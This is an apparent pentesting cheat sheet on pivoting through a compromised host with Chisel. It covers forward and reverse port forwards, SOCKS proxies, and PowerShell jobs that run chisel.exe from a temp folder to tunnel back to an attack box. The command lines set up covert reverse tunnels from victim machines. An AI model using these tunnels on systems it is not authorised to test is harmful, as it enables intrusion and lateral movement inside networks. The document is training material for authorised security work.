Chisel

Pivoting using Chisel

Hack Responsibly.

Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.

Chisel

Requirements

Requires a copy of the Chisel binary on both the target and attacker systems.

Advantages

• Chisel is a portable binary that can be run on many operating systems

  • Either system can host the chisel server on a chosen TCP port;

  • Allows for a high amount of flexibility in situations where restrictions on connectivity exist

• No dependencies on SSH daemons/services running on the target

• Supports authenticated proxies to prevent unwanted connections.

Individual Port Forwarding

Example: A service on a compromised host is listening on $RPORT

1. Run the Chisel server on the target and connect from the attack box

2. Specify the port forward on the client

3. Open a port on attack box and forward traffic to remote port

# Target Machine
./chisel server --port $SERV_PORT

# Attack Machine
./chisel client $targetIP:$SERV_PORT $LHOST:$LPORT:$RHOST:$RPORT

Open $LPORT on attack box and port forward to $RPORT on target

Reverse Individual Port Forwarding

Example: A service on a compromised host is listening on $LPORT

1. Run the Chisel server on the attack box in reverse mode and connect from the target

2. Specify the port forward on the target machine

3. Open a port on attack box and forward traffic to remote port

# Attack Machine
./chisel server --reverse --port $SERV_PORT

# Target Machine
./chisel client $attackIP:$SERV_PORT R:$RPORT:$LHOST:$LPORT

Open $RPORT on attack box and forward to $LPORT on target through reverse connection.

Socks Proxy

Server Running on Attack Box

# Attack Machine
./chisel server --reverse --port 51234

# Target Machine
./chisel client $AttackIP:51234 R:127.0.0.1:54321:socks

Opens port 54321 on attack box as a reverse SOCKS proxy. Listens for connections from Chisel on this port.

Chisel Server Running on Target

# Target Machine
./chisel server --socks5 --port 51234

# Attack Machine
./chisel client $targetIP:51234 54321:socks

Open port 54321 on attack machine as a forward SOCKS proxy

Forward Dynamic SOCKS Proxy

1. Run the Chisel server on the target box

2. Use the target box as a jump host to reach additional targets routable by the target

The traffic flows forward to the target box, which acts as a transparent SOCKS proxy

# Target Machine
./chisel server --socks5 --port $SERV_PORT

# Attack Machine
./chisel client $targetIP:$SERV_PORT $LPORT:socks

Reverse Dynamic SOCKS Proxy

1. Run the Chisel server on the attack box in reverse mode

2. Connect to the Chisel server from the target and specify a reverse port forward

The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy

# Attack Machine
./chisel server --reverse --port $SERV_PORT

# Target Machine
./chisel client $attackIP:$SERV_PORT R:127.0.0.1:$LPORT:socks

Reverse Shell Tips

Run Chisel in the Background

Running chisel in the foreground in a reverse shell will render your shell useless. Background the process in order to continue to use the shell while forwarding traffic.

Linux

Background a process with '&'. Works for both client and server sides.

chisel server --port 8080 --reverse &

Windows - PowerShell

Client Side

# Use the Start-Job cmdlet with a script block
$background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $background

Server Side

Note that in server mode, you'll need to make sure your port is allowed through the firewall.

# Use the Start-Job cmdlet with a script block
$background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--socks5') }
Start-Job -ScriptBlock $background

References

• https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel